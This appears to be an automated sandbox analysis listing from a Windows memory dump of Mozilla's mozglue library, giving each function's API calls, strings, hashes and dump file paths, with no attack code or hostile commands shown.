Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 6C6B4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C6B4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4F2E
moz_xmalloc.MOZGLUE ref: 6C6B4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C6B4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52E6
Sleep.KERNEL32(00000010), ref: 6C6B5481
free.MOZGLUE(?), ref: 6C6B5498

Strings

(, xrefs: 6C6B5250

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction ID: 4fb74f4d0ce92a9ec60c45ee6cd4a51cd83b2aaa59eff681b535a05e015bdd44
Opcode Fuzzy Hash: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction Fuzzy Hash: E1F1B271A19B408FC716CF39C89062BB7F5AFE6384F058B2EF846A7651DB31D4428B85

Function 6C679E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C679EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C679F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C679F34
LeaveCriticalSection.KERNEL32(?), ref: 6C67A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C67A8B1, 6C67A8D4, 6C67A8EF

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction ID: c1827dcb3a360c7d673e696c750ffb37eae7622c7899b4964e0a10ca42f943cf
Opcode Fuzzy Hash: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction Fuzzy Hash: BA728D72A157118FD324CF28C540615FBE1BF89328F29CB6DE8698B792D335E841CB94

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

expected a Time entry, xrefs: 6C6A2E36
(root), xrefs: 6C6A354F
ProfileBuffer parse error: %s, xrefs: 6C6A2E3B

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 6C6B9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C6B9F3D
__aulldiv.LIBCMT ref: 6C6B9F77
__aullrem.LIBCMT ref: 6C6B9F8C
__aulldiv.LIBCMT ref: 6C6BA023

Strings

-Infinity, xrefs: 6C6B9E60, 6C6B9E7B
NaN, xrefs: 6C6B9EAB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction ID: cec4c0ba687317817b06540f2b3d32a47266ace032b3340d36d16366b67eb18d
Opcode Fuzzy Hash: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction Fuzzy Hash: FDC1DE31E043188BDB14CFA8C8907DEB7B6FF85318F544529D40ABBB81DB70A959CB99

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

9, xrefs: 6C65DE7F
0, xrefs: 6C65D852
, xrefs: 6C65DA88
0, xrefs: 6C65DC7F
@, xrefs: 6C65DAF6
1, xrefs: 6C65DBDD
8, xrefs: 6C65DC08
-, xrefs: 6C65D7DD

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C5740, 6C6C9269, 6C6C9459, 6C6C5703, 6C6C921F, 6C6C56C7, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C5740, 6C6C9269, 6C6C9459, 6C6C5703, 6C6C921F, 6C6C56C7, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 6C65BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C65C1CB
__aulldiv.LIBCMT ref: 6C65C24C
__aulldiv.LIBCMT ref: 6C65C348
__aullrem.LIBCMT ref: 6C65C365
__aulldiv.LIBCMT ref: 6C65C37D

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: ca4ed2d6a03da8a3f704beac6cc95ae7f98496a33d9bce822fe9f562690d7ed6
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 18323632B046119FC718DE2CC89065ABBE6AFC9310F59866DE896CB395D730ED15CB90

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 6C674640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C674777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C675585, 6C6755A8, 6C6755C3, 6C675624

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction ID: e152d09da89ed65f54dddbc3e1f9f5dc8f98e24aebc063a76cc89704db909104
Opcode Fuzzy Hash: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction Fuzzy Hash: 58B2DE71A057018FD328CF18C584725FBE2BFC5324B29CBADE4698B6A5D771E841CB98

Function 6C6B85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6B8C7C
__aulldiv.LIBCMT ref: 6C6B8DD7

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 814de8cf06003e87ebb2477e944c0d94209f8b6e29ef4fbe5db3ef8435c7af2b
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D5328F71F0011A8BDF18CE9CC8A17AEB7B2FB8C304F15853AD506BB7A0DA349D558B95

Function 6C6C76E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C793C, 6C6C7E0B, 6C6C7B0B, 6C6C79C0, 6C6C7796, 6C6C79FB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: c3f351375ce2f0f9a3e522e778f1118c83f9cb449e28e628ffd06b8ba48e099a
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: AF320971E006198FCB14CF98C890AADFBF2FF88308F54816AC559A7745D731A986CF95

Function 6C6C6E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C793C, 6C6C7E0B, 6C6C7C03, 6C6C7B0B, 6C6C7C72, 6C6C79C0, 6C6C79FB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 3be4a28f322a9970853bb3041ef7813f79d8eca11099a4da24d4568498a361c3
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: F822E771E006198FCB14CF98C880AADF7F2FF89304F6485AAC949A7745D731A986CF95

Function 6C695C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C664A63,?,?), ref: 6C695F06

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction ID: 4e78ddb84189f0b869c18d016eff578674f1ff09ffa21a39c9186e2f069ba6a1
Opcode Fuzzy Hash: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction Fuzzy Hash: 5FC1C275D0120A8BCB04CFA5D5906EEBBF2FF8A319F28425DD8556BB44D732A806CF94

Function 6C680512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 3e2dc702d0882207978e665154e5a8ef5aaab46da424cb116f28f689c6641572
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 72223771E05619CFCB24CF98C890AADF7B2FF89308F548699C54AA7705D730A986CF94

Function 6C6CAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction ID: c26b37ba736ff65f4445e7514a68d184ead88ba06c877f9f6937d7afe7b65eb5
Opcode Fuzzy Hash: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction Fuzzy Hash: 8DF13971B087454FD700CE28C8917AAB7E2EFC6318F148A2DE5E487792E774D8898797

Function 6C65C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 47d4b005ea0d460a9a087beec7120d377fd57c6bf0f934b183e120b1cd954d5e
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 16A1AF71F0021A9FDB08CE68C8913AEB7F2AFC9354F588129D916E7781DB349D168B90

Function 6C6B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C68E1A5), ref: 6C6B5606
LoadLibraryW.KERNEL32(gdi32,?,6C68E1A5), ref: 6C6B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6B57FF

Strings

GetMonitorInfoW, xrefs: 6C6B57A2
SetWindowPos, xrefs: 6C6B56F7
ReleaseDC, xrefs: 6C6B5742
CreateWindowExW, xrefs: 6C6B56C5
LoadIconW, xrefs: 6C6B575B
GetThreadDpiAwarenessContext, xrefs: 6C6B562D
SetWindowLongPtrW, xrefs: 6C6B57B7
AreDpiAwarenessContextsEqual, xrefs: 6C6B5637
RegisterClassW, xrefs: 6C6B56AC
StretchDIBits, xrefs: 6C6B57CC
GetSystemMetricsForDpi, xrefs: 6C6B5677
gdi32, xrefs: 6C6B560A
ShowWindow, xrefs: 6C6B56DE
DeleteObject, xrefs: 6C6B57F9
GetDpiForWindow, xrefs: 6C6B5690
LoadCursorW, xrefs: 6C6B5774
FillRect, xrefs: 6C6B5729
GetWindowDC, xrefs: 6C6B5710
CreateSolidBrush, xrefs: 6C6B57E4
MonitorFromWindow, xrefs: 6C6B578D
user32, xrefs: 6C6B5601
EnableNonClientDpiScaling, xrefs: 6C6B5666

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
